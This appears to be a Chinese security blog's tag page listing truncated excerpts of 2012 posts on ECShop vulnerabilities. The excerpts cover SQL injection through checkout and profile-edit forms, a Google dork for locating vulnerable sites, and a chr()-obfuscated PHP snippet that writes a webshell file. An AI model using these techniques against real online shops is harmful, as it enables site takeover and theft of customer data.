标签 ecshop 下的文章

ecshop最新漏洞

先注册账户,随便选个商品进购物车,把任意商品加入购物车在填写配送地址那一页,有地区选择,然后填地址,电话什么的flow.php?step=consignee&direct_shopping=1 比如省选择北京 其中POST数据如下country=1&province=2&city=37&district=409&consignee=11111&...

没穿底裤 2012 年 12 月 26 日 1 条评论

ECShop_V2.7.3_GBK_release1106 注入 0day

[php] /* 修改个人资料的处理 */ elseif ($action == 'act_edit_profile') { include_once(ROOT_PATH . 'includes/lib_transaction.php');$birthday = trim($_POST['birthdayYear']) .'-'. trim($_POST['birthdayMonth']) ...

没穿底裤 2012 年 12 月 22 日 暂无评论

ECShop => SQL Injection Vulnerability

# Google dork: inurl:mobile/goods.php?id= intext:powered by ECShop 关键字: inurl:mobile/goods.php?id= intext:powered by ECShop#Security risk : Critical # Tested on: BackTrack 5 # Demo site: http://...

没穿底裤 2012 年 06 月 21 日 暂无评论

ecshop后台最新拿shell方法,支持最新2.72版本。通杀最新版本后台低权限

<?php $filen=chr(46).chr(46).chr(47).chr(110).chr(117).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112); $filec=chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).c...

没穿底裤 2012 年 05 月 21 日 暂无评论